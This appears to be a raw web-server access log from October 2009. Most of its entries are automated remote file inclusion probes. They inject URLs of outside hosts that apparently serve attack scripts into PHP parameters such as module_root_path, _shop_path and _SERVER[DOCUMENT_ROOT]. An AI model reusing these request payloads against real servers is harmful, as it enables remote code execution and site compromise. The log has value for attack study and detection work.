94.102.6.154 - - [17/Oct/2009:03:27:12 -0400] "GET /logs/access_log.Q109050900%20%20//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:13 -0400] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:13 -0400] "GET /logs/access_log.Q109050900%20%20//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:13 -0400] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:17 -0400] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:17 -0400] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:17 -0400] "GET /logs/access_log.Q109050900//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:18 -0400] "GET /logs/access_log.Q109050900//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:18 -0400] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:18 -0400] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:19 -0400] "GET //racconti//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:19 -0400] "GET /logs//racconti//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:31 -0400] "GET /logs/access_log.Q109053100//racconti//?path%5Bdocroot%5D=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:32 -0400] "GET //racconti//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:32 -0400] "GET /logs//racconti//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:27:45 -0400] "GET /logs/access_log.Q109053100//racconti//?path%5Bdocroot%5D=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:28:21 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:28:21 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:28:21 -0400] "GET //include/admin.lib.inc.php?site_path=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:28:29 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:28:29 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:28:29 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:28:31 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:28:32 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:28:32 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:28:38 -0400] "GET /logs/access_log.Q109100700//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:28:38 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:28:38 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:28:38 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:28:39 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:28:39 -0400] "GET /logs/access_log.Q109051100%20%20//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:28:39 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:28:40 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:28:40 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:28:40 -0400] "GET /logs/access_log.Q109051100%20%20//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:28:40 -0400] "GET /logs/access_log.Q109100700//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:28:42 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:28:42 -0400] "GET /logs/access_log.Q109080200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:28:42 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:28:47 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:28:47 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:28:47 -0400] "GET /logs/access_log.Q109100700//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:28:47 -0400] "GET /logs/access_log.Q109080200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:28:48 -0400] "GET /logs/access_log.Q109100700%20%20//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:28:48 -0400] "GET /logs/access_log.Q109071000%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:28:51 -0400] "GET /logs/access_log.Q109100700%20%20//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:28:52 -0400] "GET /logs/access_log.Q109071000%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.7.194.67 - - [17/Oct/2009:03:28:54 -0400] "GET /logs/access_log.Q109081800/?custompluginfile[]=http://www.alis-plus.com/README.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
66.7.194.67 - - [17/Oct/2009:03:28:54 -0400] "GET /?custompluginfile[]=http://www.alis-plus.com/README.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
66.7.194.67 - - [17/Oct/2009:03:28:54 -0400] "GET /logs/?custompluginfile[]=http://www.alis-plus.com/README.txt? HTTP/1.1" 200 22188 "-" "libwww-perl/5.831"
125.251.147.194 - - [17/Oct/2009:03:28:55 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:28:55 -0400] "GET /logs/access_log.Q109051100%20%20//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:28:55 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:29:00 -0400] "GET /logs/access_log.Q109100700%20%20//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:29:10 -0400] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:29:10 -0400] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:29:11 -0400] "GET /logs/access_log.Q109092400%20%20//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:29:13 -0400] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:29:13 -0400] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:29:13 -0400] "GET /logs/access_log.Q109092400%20%20//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:29:17 -0400] "GET /logs/access_log.Q109050900%20%20//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:29:17 -0400] "GET /logs/access_log.Q109050900%20%20//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:29:18 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:29:18 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:29:18 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:29:24 -0400] "GET /logs/access_log.Q109100700//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:29:28 -0400] "GET /logs/error_log.Q109100300//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:29:28 -0400] "GET /logs/access_log.Q109100300//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:29:30 -0400] "GET /logs/access_log.Q109080600%20%20//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
94.102.6.154 - - [17/Oct/2009:03:29:30 -0400] "GET /logs/access_log.Q109080600%20%20//pafiledb/includes/pafiledb_constants.php?module_root_path=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:29:45 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:29:45 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:29:45 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:29:47 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:29:47 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:29:47 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:29:49 -0400] "GET /logs/access_log.Q109100700//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
95.211.6.161 - - [17/Oct/2009:03:29:51 -0400] "GET /logs/access_log.Q109100700//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:29:51 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:29:51 -0400] "GET /logs/access_log.Q109080200//?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:29:52 -0400] "GET //include/admin.lib.inc.php?site_path=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:29:52 -0400] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:03:29:52 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:29:51 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:30:03 -0400] "GET /logs/access_log.Q109071000//?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:30:36 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:30:36 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:30:36 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:30:40 -0400] "GET /logs/access_log.Q109100700//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:30:40 -0400] "GET /logs/access_log.Q109080200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:30:40 -0400] "GET /logs/access_log.Q109071000%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:31:04 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:31:04 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:31:08 -0400] "GET /logs/access_log.Q109051100//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:03:31:13 -0400] "GET /logs/access_log.Q109100700//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
174.103.125.200 - - [17/Oct/2009:03:31:15 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://us.mc624.mail.yahoo.com/mc/welcome?.gx=1&.tm=1255764812&.rand=465h6mdn17jlr" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
209.59.12.99 - - [17/Oct/2009:03:31:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.124.127.164 - - [17/Oct/2009:03:32:11 -0400] "GET /logs/error_log.Q109100300//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:03:32:11 -0400] "GET /logs/access_log.Q109100300//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:32:32 -0400] "GET /logs/access_log.Q109080200//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:32:32 -0400] "GET /logs/access_log.Q109080200//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:32:32 -0400] "GET /logs/access_log.Q109071000//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Oct/2009:03:32:33 -0400] "GET /logs/access_log.Q109071000//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:34:35 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:34:35 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:34:37 -0400] "GET /logs/access_log.Q109080200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:34:38 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:34:41 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:34:41 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 200 22193 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:34:41 -0400] "GET /logs/access_log.Q109080200%20%20//?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:34:43 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:34:48 -0400] "GET /logs/access_log.Q109080200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:35:04 -0400] "GET /logs/access_log.Q109071000%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:35:06 -0400] "GET /logs/access_log.Q109071000%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:35:14 -0400] "GET /logs/access_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:35:14 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 200 22195 "-" "Mozilla/5.0"
72.11.145.8 - - [17/Oct/2009:03:35:14 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:03:36:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.54.130 - - [17/Oct/2009:03:36:35 -0400] "GET /logs/access_log.Q109080200//?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
124.0.54.130 - - [17/Oct/2009:03:36:37 -0400] "GET /logs/access_log.Q109071000//?_SERVER[DOCUMENT_ROOT]=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:37:07 -0400] "GET //bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
125.251.147.194 - - [17/Oct/2009:03:37:07 -0400] "GET /logs//bbshop/admin/admin.php?_shop_path=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
